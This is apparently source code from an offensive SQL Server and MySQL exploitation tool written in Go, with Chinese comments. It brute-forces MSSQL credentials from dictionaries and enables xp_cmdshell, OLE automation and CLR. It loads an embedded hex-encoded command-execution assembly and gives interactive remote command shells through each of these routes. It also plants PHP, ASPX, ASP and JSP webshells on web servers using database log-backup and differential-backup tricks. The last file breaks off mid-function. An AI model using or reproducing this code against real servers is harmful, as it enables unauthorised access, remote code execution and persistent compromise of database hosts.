/pac/mssql_CLR.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | // 判断是否开启CLR
12 | func MssqlCLR(conn *sql.DB) (err error) {
13 | 
14 | 	sqlstr1 := "exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;"
15 | 	MssqlCMD(sqlstr1, conn)
16 | 	Info("exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;执行")
17 | 
18 | 	sqlstr2 := "ALTER DATABASE [master] SET TRUSTWORTHY ON;"
19 | 	MssqlCMD(sqlstr2, conn)
20 | 	Info("ALTER DATABASE [master] SET TRUSTWORTHY ON;执行")
21 | 
22 | 	clr := "0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
23 | 	sqlsstr3 := fmt.Sprintf("CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM %s WITH PERMISSION_SET = UNSAFE;", clr)
24 | 	MssqlCMD(sqlsstr3, conn)
25 | 
26 | 	sqlsstr4 := "CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;"
27 | 	MssqlCMD(sqlsstr4, conn)
28 | 	return err
29 | }
30 | 
31 | // 开启CLR之后获取一个cmd shell
32 | func CMDconsole_CLR(conn *sql.DB) {
33 | 
34 | 	table := Creatable(conn)
35 | 
36 | 	Info("执行系统命令")
37 | 	reader := bufio.NewReader(os.Stdin)
38 | 	for {
39 | 		clrcmd := "EXEC sp_cmdExec "
40 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
41 | 		cmd, _ := reader.ReadString('\n')
42 | 		cmd = strings.TrimRight(cmd, "\r\n")
43 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
44 | 			break
45 | 		}
46 | 		aa := fmt.Sprintf("%s\"%s >> C:\\\\test11.txt\";", clrcmd, cmd)
47 | 		Info(aa)
48 | 		fmt.Println(MssqlCMD(aa, conn))
49 | 
50 | 		Insertresult(table, conn)
51 | 	}
52 | }
53 | 
54 | // 执行单条命令
55 | func CMDone_CLR(cmd3 string, conn *sql.DB) (err error) {
56 | 	table := Creatable(conn)
57 | 
58 | 	Info("执行系统命令")
59 | 	clrcmd := "EXEC sp_cmdExec "
60 | 	bb := fmt.Sprintf("%s\"%s >> C:\\\\test11.txt\";", clrcmd, cmd3)
61 | 	Info(bb)
62 | 	MssqlCMD(bb, conn)
63 | 
64 | 	Insertresult(table, conn)
65 | 
66 | 	return err
67 | }
68 | 
69 | func DeleteWarSQLKit(conn *sql.DB) {
70 | 	Info("删除创建的程序集WarSQLKit")
71 | 	sqlstr := "DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];"
72 | 	Info("执行DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];删除程序集")
73 | 	MssqlCMD(sqlstr, conn)
74 | }
75 | 


--------------------------------------------------------------------------------
/pac/mssql_cmd.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | 	"time"
10 | )
11 | 
12 | // 执行sql命令行
13 | func MssqlCMD(sqlstr string, conn *sql.DB) []interface{} {
14 | 
15 | 	stmt, err := conn.Prepare(sqlstr)
16 | 	if err != nil {
17 | 		Err(err)
18 | 		return nil
19 | 	}
20 | 	defer stmt.Close()
21 | 
22 | 	rows, err := stmt.Query()
23 | 	if err != nil {
24 | 		Err(err)
25 | 		return nil
26 | 	}
27 | 
28 | 	cols, _ := rows.Columns()
29 | 	var colsdata = make([]interface{}, len(cols))
30 | 	for i := 0; i < len(cols); i++ {
31 | 		colsdata[i] = new(interface{})
32 | 	}
33 | 
34 | 	for rows.Next() {
35 | 		rows.Scan(colsdata...) //将查到的数据写入到这行中
36 | 		PrintRow(colsdata)     //打印此行
37 | 	}
38 | 	defer rows.Close()
39 | 	return colsdata
40 | }
41 | 
42 | func PrintRow(colsdata []interface{}) (err error, result interface{}) {
43 | 	for _, val := range colsdata {
44 | 		switch v := (*(val.(*interface{}))).(type) {
45 | 		case nil:
46 | 			//fmt.Print("NULL")
47 | 		case bool:
48 | 			if v {
49 | 				fmt.Print("True")
50 | 			} else {
51 | 				fmt.Print("False")
52 | 			}
53 | 
54 | 		case []byte:
55 | 			fmt.Print(string(v))
56 | 		case time.Time:
57 | 			fmt.Print(v.Format("2022-10-31 19:10:00.999"))
58 | 		default:
59 | 			fmt.Print(v)
60 | 		}
61 | 		fmt.Println()
62 | 	}
63 | 	return err, result
64 | }
65 | 
66 | // 循环执行sql语句
67 | func loopMssqlCMD(conn *sql.DB) {
68 | 	Info("执行mssql命令")
69 | 	reader := bufio.NewReader(os.Stdin)
70 | 	for {
71 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
72 | 		cmd, _ := reader.ReadString('\n')
73 | 		cmd = strings.TrimRight(cmd, "\r\n")
74 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
75 | 			break
76 | 		}
77 | 		MssqlCMD(cmd, conn)
78 | 	}
79 | }
80 | 


--------------------------------------------------------------------------------
/pac/mssql_connect.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | 	_ "github.com/denisenkom/go-mssqldb"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | var (
12 | 	database = "master"
13 | )
14 | 
15 | func MssqlConnect(Rhost string, Rport string, Ruser string, pwd string) (err error, db *sql.DB, sign bool) {
16 | 	connString := fmt.Sprintf("server=%s;port%d;database=%s;user id=%s;password=%s", Rhost, Rport, database, Ruser, pwd)
17 | 
18 | 	conn, err := sql.Open("mssql", connString)
19 | 	if err != nil {
20 | 		Err(err)
21 | 		return nil, nil, false
22 | 	}
23 | 
24 | 	err = conn.Ping()
25 | 	if err != nil {
26 | 		Err(err)
27 | 		return nil, nil, false
28 | 	}
29 | 	sign = true
30 | 
31 | 	return err, conn, sign
32 | }
33 | 
34 | func MssqlCrack(Rhost string, Rport string) {
35 | 	Info("开始爆破,请稍等.....")
36 | 	sign = false
37 | 	for _, user := range Userdict["mssql"] {
38 | 		for _, pass := range Passwords {
39 | 			pass = strings.Replace(pass, "{user}", user, -1)
40 | 			_, _, sign := MssqlConnect(Rhost, Rport, user, pass)
41 | 			if sign == true {
42 | 				Success(fmt.Sprintf("账号密码为：%s:%s", user, pass))
43 | 				os.Exit(0)
44 | 			} else {
45 | 				fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass))
46 | 			}
47 | 		}
48 | 	}
49 | }
50 | 


--------------------------------------------------------------------------------
/pac/mssql_spoacreate.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | // 开启sp_oacreate
12 | func OpenSpoacreate(conn *sql.DB) {
13 | 
14 | 	sqlstr1 := "select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';"
15 | 	MssqlCMD(sqlstr1, conn)
16 | 	Info("select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';执行正常")
17 | 
18 | 	Info("尝试开启sp_oacreate存储过程")
19 | 	sqlstr2 := "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"
20 | 	MssqlCMD(sqlstr2, conn)
21 | 	Info("exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;执行正常")
22 | }
23 | 
24 | // 开启sp_oacreate之后获取一个cmd shell,回显方法一
25 | func CMDconsole_Spoacreate(conn *sql.DB) {
26 | 
27 | 	table := Creatable(conn)
28 | 
29 | 	Info("执行系统命令")
30 | 	reader := bufio.NewReader(os.Stdin)
31 | 	for {
32 | 		spcmd := "declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,\"c:\\windows\\system32\\cmd.exe /c "
33 | 		//var cmd string
34 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
35 | 		cmd, _ := reader.ReadString('\n')
36 | 		cmd = strings.TrimRight(cmd, "\r\n")
37 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
38 | 			break
39 | 		}
40 | 		//"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c whoami>C:\\\\1a1.txt'"
41 | 		aa := fmt.Sprintf("%s%s > C:\\\\test11.txt\";", spcmd, cmd)
42 | 		Info(aa)
43 | 		MssqlCMD(aa, conn)
44 | 		Insertresult(table, conn)
45 | 	}
46 | }
47 | 
48 | // 执行单条命令
49 | func CMDone_Spoacreate(cmd1 string, conn *sql.DB) (err error) {
50 | 	table := Creatable(conn)
51 | 
52 | 	Info("执行系统命令")
53 | 	spcmd := "declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,\"c:\\windows\\system32\\cmd.exe /c "
54 | 	aa := fmt.Sprintf("%s%s >> C:\\test11.txt\";", spcmd, cmd1)
55 | 	Info(aa)
56 | 	MssqlCMD(aa, conn)
57 | 
58 | 	Insertresult(table, conn)
59 | 
60 | 	return err
61 | }
62 | 
63 | // 回显方法二,直接回显
64 | func CMDconsole_Spoacreate_two(conn *sql.DB) {
65 | 
66 | 	Info("执行系统命令")
67 | 	reader := bufio.NewReader(os.Stdin)
68 | 	for {
69 | 		spcmd := "declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output exec sp_oamethod @luan,'exec',@exec output,'c:\\windows\\system32\\cmd.exe /c "
70 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
71 | 		cmd, _ := reader.ReadString('\n')
72 | 		cmd = strings.TrimRight(cmd, "\r\n")
73 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
74 | 			break
75 | 		}
76 | 		aa := fmt.Sprintf("%s%s';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out select @str;", spcmd, cmd)
77 | 		Info(aa)
78 | 		MssqlCMD(aa, conn)
79 | 	}
80 | }
81 | 
82 | func CMDone_Spoacreate_two(cmd1 string, conn *sql.DB) (err error) {
83 | 	Info("执行系统命令")
84 | 	spcmd := "declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output exec sp_oamethod @luan,'exec',@exec output,'c:\\windows\\system32\\cmd.exe /c "
85 | 	aa := fmt.Sprintf("%s%s';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out select @str;", spcmd, cmd)
86 | 	Info(aa)
87 | 	MssqlCMD(aa, conn)
88 | 	return err
89 | }
90 | 


--------------------------------------------------------------------------------
/pac/mssql_webshell.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"database/sql"
  5 | 	"fmt"
  6 | 	"os"
  7 | 	"time"
  8 | )
  9 | 
 10 | func Choice_two(webshell []byte, conn *sql.DB, num string) {
 11 | 	fmt.Println(string(webshell))
 12 | 	if num == "1" {
 13 | 		Webshell_logbak(conn, path, string(webshell))
 14 | 	} else if num == "2" {
 15 | 		Webshell_difshell(conn, path, string(webshell))
 16 | 	}
 17 | }
 18 | 
 19 | func Choice(num string, conn *sql.DB, e string) {
 20 | 	if e == "php" {
 21 | 		webshell, err := os.ReadFile("shell\\shell.php")
 22 | 		if err != nil {
 23 | 			Err(err)
 24 | 		}
 25 | 		Info("php一句话木马，密钥'x'")
 26 | 		Choice_two(webshell, conn, num)
 27 | 	} else if e == "aspx" {
 28 | 		webshell, err := os.ReadFile("shell\\shell.aspx")
 29 | 		if err != nil {
 30 | 			Err(err)
 31 | 		}
 32 | 		Info("冰蝎aspx版本webshell")
 33 | 		Choice_two(webshell, conn, num)
 34 | 	} else if e == "asp" {
 35 | 		webshell, err := os.ReadFile("shell\\shell.asp")
 36 | 		if err != nil {
 37 | 			Err(err)
 38 | 		}
 39 | 		Info("冰蝎asp版本webshell")
 40 | 		Choice_two(webshell, conn, num)
 41 | 	} else if e == "jsp" {
 42 | 		webshell, err := os.ReadFile("shell\\shell.jsp")
 43 | 		if err != nil {
 44 | 			Err(err)
 45 | 		}
 46 | 		Info("冰蝎jsp版本webshell")
 47 | 		Choice_two(webshell, conn, num)
 48 | 	} else {
 49 | 		Info("未选择webshell脚本")
 50 | 	}
 51 | }
 52 | 
 53 | // 日志备份getshell
 54 | func Webshell_logbak(conn *sql.DB, path string, webshell string) {
 55 | 	database := RandStr(6)
 56 | 	MssqlCMD(fmt.Sprintf("create database %s", database), conn)
 57 | 	time.Sleep(time.Duration(2) * time.Second)
 58 | 	Success("创建数据库成功！")
 59 | 
 60 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk = 'C://1.bak';", database), conn)
 61 | 	time.Sleep(time.Duration(1) * time.Second)
 62 | 	Success("备份数据库成功！")
 63 | 
 64 | 	MssqlCMD(fmt.Sprintf("alter database %s set RECOVERY FULL;", database), conn)
 65 | 	time.Sleep(time.Duration(1) * time.Second)
 66 | 	Success("修改数据库恢复模式为完整模式！")
 67 | 
 68 | 	MssqlCMD(fmt.Sprintf("create table %s.dbo.test7913(a image);", database), conn)
 69 | 	time.Sleep(time.Duration(1) * time.Second)
 70 | 	Success("创建表成功！")
 71 | 
 72 | 	MssqlCMD(fmt.Sprintf("backup log %s to disk = 'c://xxx.bak' with init;", database), conn)
 73 | 	time.Sleep(time.Duration(1) * time.Second)
 74 | 	Success("备份操作日志成功！")
 75 | 
 76 | 	MssqlCMD(fmt.Sprintf("insert into %s.dbo.test7913(a) values (%s);", database, webshell), conn)
 77 | 	time.Sleep(time.Duration(1) * time.Second)
 78 | 	Success("插入webshell成功")
 79 | 
 80 | 	MssqlCMD(fmt.Sprintf("backup log %s to disk = '%s';", database, path), conn)
 81 | 	Success("Webshell写入成功，请尝试连接！")
 82 | }
 83 | 
 84 | // 差异备份getshell
 85 | func Webshell_difshell(conn *sql.DB, path string, webshell string) {
 86 | 	database := RandStr(6)
 87 | 	MssqlCMD(fmt.Sprintf("create database %s", database), conn)
 88 | 	time.Sleep(time.Duration(1) * time.Second)
 89 | 	Success("创建数据库成功！")
 90 | 
 91 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk = 'C://1.bak';", database), conn)
 92 | 	time.Sleep(time.Duration(1) * time.Second)
 93 | 	Success("备份数据库成功！")
 94 | 
 95 | 	MssqlCMD(fmt.Sprintf("create table %s.[dbo].[test7913] ([cmd] [image]);", database), conn)
 96 | 	time.Sleep(time.Duration(1) * time.Second)
 97 | 	Success("创建表成功")
 98 | 
 99 | 	MssqlCMD(fmt.Sprintf("insert into %s.dbo.test7913(cmd) values(%s);", database, webshell), conn)
100 | 	time.Sleep(time.Duration(1) * time.Second)
101 | 	Success("插入Webshell成功")
102 | 
103 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk='%s' WITH DIFFERENTIAL,FORMAT;", database, path), conn)
104 | 	time.Sleep(time.Duration(1) * time.Second)
105 | 	Success("Webshell写入成功，请尝试连接！")
106 | }
107 | 


--------------------------------------------------------------------------------
/pac/mssql_xpcmdshell.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | // 开启xp_cmdshell
12 | func MssqlXpcmdshell(conn *sql.DB) (err error) {
13 | 
14 | 	sqlstr1 := "select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';"
15 | 	MssqlCMD(sqlstr1, conn) //
16 | 
17 | 	Info("select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'执行正常")
18 | 	Info("尝试开启xp_cmdshell")
19 | 	sqlstr2 := "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
20 | 	res2 := MssqlCMD(sqlstr2, conn)
21 | 	Info("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;执行正常")
22 | 	err2, v2 := PrintRow(res2)
23 | 	fmt.Sprintf("%v", v2)
24 | 	if err2 != nil {
25 | 		Err(err2)
26 | 	}
27 | 	return err
28 | }
29 | 
30 | // 开启xpcmd之后获取一个cmd shell
31 | func MssqlCMDConsole(conn *sql.DB) {
32 | 	Info("执行系统命令")
33 | 	reader := bufio.NewReader(os.Stdin)
34 | 	for {
35 | 		xpcmd := "exec master..xp_cmdshell "
36 | 		var cmd string
37 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
38 | 		cmd, _ = reader.ReadString('\n')
39 | 		cmd = strings.TrimRight(cmd, "\r\n")
40 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
41 | 			break
42 | 		}
43 | 
44 | 		aa := fmt.Sprintf("%s'%s';", xpcmd, cmd)
45 | 		xpcmd = strings.TrimRight(xpcmd, "\r\n")
46 | 		Info(aa)
47 | 		MssqlCMD(aa, conn)
48 | 	}
49 | }
50 | 
51 | // 执行单条命令
52 | func MssqlCMDone(cmd1 string, conn *sql.DB) (err error) {
53 | 	Info("执行系统命令")
54 | 	xpcmd := "exec master..xp_cmdshell "
55 | 	xpcmd = xpcmd + "\"" + cmd1 + "\"" + ";"
56 | 	xpcmd = strings.TrimRight(xpcmd, "\r\n")
57 | 	Info(xpcmd)
58 | 	MssqlCMD(xpcmd, conn)
59 | 	return err
60 | }
61 | 


--------------------------------------------------------------------------------
/pac/mysql_cmd.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"database/sql"
  6 | 	"fmt"
  7 | 	"log"
  8 | 	"os"
  9 | 	"strings"
 10 | )
 11 | 
 12 | func MysqlCMD(sqlstr string, conn *sql.DB) ([]map[string]interface{}, error) {
 13 | 	rows, err := conn.Query(sqlstr)
 14 | 
 15 | 	if err != nil {
 16 | 		log.Println(err)
 17 | 		return nil, err
 18 | 	}
 19 | 	defer rows.Close()
 20 | 
 21 | 	// 数据列
 22 | 	columns, err := rows.Columns()
 23 | 	if err != nil {
 24 | 		log.Println(err)
 25 | 		return nil, err
 26 | 	}
 27 | 
 28 | 	count := len(columns)
 29 | 
 30 | 	mData := make([]map[string]interface{}, 0)
 31 | 	values := make([]interface{}, count)
 32 | 	valPointers := make([]interface{}, count)
 33 | 	for rows.Next() {
 34 | 		for i := 0; i < count; i++ {
 35 | 			valPointers[i] = &values[i]
 36 | 		}
 37 | 
 38 | 		rows.Scan(valPointers...)
 39 | 
 40 | 		entry := make(map[string]interface{})
 41 | 
 42 | 		for i, col := range columns {
 43 | 			var v interface{}
 44 | 
 45 | 			val := values[i]
 46 | 			b, ok := val.([]byte)
 47 | 			if ok {
 48 | 				v = string(b)
 49 | 			} else {
 50 | 				v = val
 51 | 			}
 52 | 			entry[col] = v
 53 | 		}
 54 | 
 55 | 		mData = append(mData, entry)
 56 | 	}
 57 | 	return mData, nil
 58 | }
 59 | 
 60 | // 循环执行sql语句
 61 | func loopMysqlCMD(conn *sql.DB) {
 62 | 	Info("执行mysql命令")
 63 | 	reader := bufio.NewReader(os.Stdin)
 64 | 	for {
 65 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
 66 | 		cmd, _ := reader.ReadString('\n')
 67 | 		cmd = strings.TrimRight(cmd, "\r\n")
 68 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 69 | 			break
 70 | 		}
 71 | 		result, err := MysqlCMD(cmd, conn)
 72 | 
 73 | 		if err != nil {
 74 | 			Info("循环执行sql语句报错")
 75 | 		}
 76 | 		for i, _ := range result {
 77 | 			for _, w := range result[i] {
 78 | 				fmt.Println(w)
 79 | 			}
 80 | 		}
 81 | 	}
 82 | }
 83 | 
 84 | func MysqlCMDConsole(conn *sql.DB) {
 85 | 	Info("执行系统命令")
 86 | 	reader := bufio.NewReader(os.Stdin)
 87 | 	for {
 88 | 		udfcmd := "select sys_eval(\""
 89 | 		var cmd string
